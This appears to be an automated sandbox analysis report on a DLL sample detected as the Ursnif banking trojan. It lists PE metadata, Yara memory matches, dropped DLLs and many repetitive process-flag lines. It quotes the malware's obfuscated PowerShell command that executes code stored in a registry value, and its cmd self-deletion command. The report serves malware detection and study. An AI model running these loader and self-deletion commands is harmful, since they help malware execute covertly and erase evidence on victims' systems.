Source: 2u2mgtylJy.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2u2mgtylJy.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2u2mgtylJy.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 2u2mgtylJy.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: 2u2mgtylJy.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.504539296.0000000004BC0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.540765718.00000000064E0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.504539296.0000000004BC0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.540765718.00000000064E0000.00000004.00000001.sdmp
Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: 2u2mgtylJy.dll
Source: 2u2mgtylJy.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2u2mgtylJy.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2u2mgtylJy.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2u2mgtylJy.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2u2mgtylJy.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F37AB0 push ecx; ret 0_2_00F37AB9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F37E1F push ecx; ret 0_2_00F37E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E7E1F push ecx; ret 3_2_032E7E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E7AB0 push ecx; ret 3_2_032E7AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031B7E1F push ecx; ret 6_2_031B7E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031B7AB0 push ecx; ret 6_2_031B7AB9
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0B1B5 push 3B000001h; retf 31_2_00A0B1BA
PE file contains an invalid checksum
Source: jdlmh2q4.dll.18.dr Static PE information: real checksum: 0x0 should be: 0x1012
Source: yg5i0oy3.dll.29.dr Static PE information: real checksum: 0x0 should be: 0x10739
Source: 2u2mgtylJy.dll Static PE information: real checksum: 0x75958 should be: 0x72222
Source: w34iw342.dll.20.dr Static PE information: real checksum: 0x0 should be: 0xca3f
Source: 4z2qptpk.dll.33.dr Static PE information: real checksum: 0x0 should be: 0xa128
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\w34iw342.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yg5i0oy3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4z2qptpk.cmdline'

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\jdlmh2q4.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\w34iw342.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\yg5i0oy3.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\4z2qptpk.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471379540.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462394382.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462596690.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440860771.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462470408.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1014883407.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521272154.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502330882.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440884295.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462528723.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502570590.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448279110.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502479250.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.466413805.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440805888.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.443913452.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521180114.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521239146.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502279805.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440780908.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502609356.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440846323.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440750956.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.473802684.000000000585C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462613151.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440828072.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502443301.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.450243555.000000000385C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462579053.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502514325.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462505929.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462554968.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7044, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7076, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2988, type: MEMORYSTR
Source: Yara match File source: 3.3.rundll32.exe.595a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.595a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.59d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.39d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.3a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.3a08d40.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.395a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.395a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.471332372.00000000059D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471296215.000000000595A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.516409229.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448235433.00000000039D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.518371045.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.638276522.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448202934.000000000395A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.975772859.0000000000CC1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1014253469.00000000009F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.760211370.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1031952216.00000000036DF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.564342319.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.514046155.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 6.3.rundll32.exe.2f18cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.31b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4ad8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.2e38cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30994a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.rundll32.exe.4da94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.11c8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30994a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.32d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.rundll32.exe.4da94a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.405323039.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.408114811.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.441574566.0000000004DA9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.392684354.0000000004AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.379823360.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1031847284.0000000003099000.00000004.00000040.sdmp, type: MEMORY
Self deletion via cmd delete
Source: C:\Windows\explorer.exe Process created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\2u2mgtylJy.dll'
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
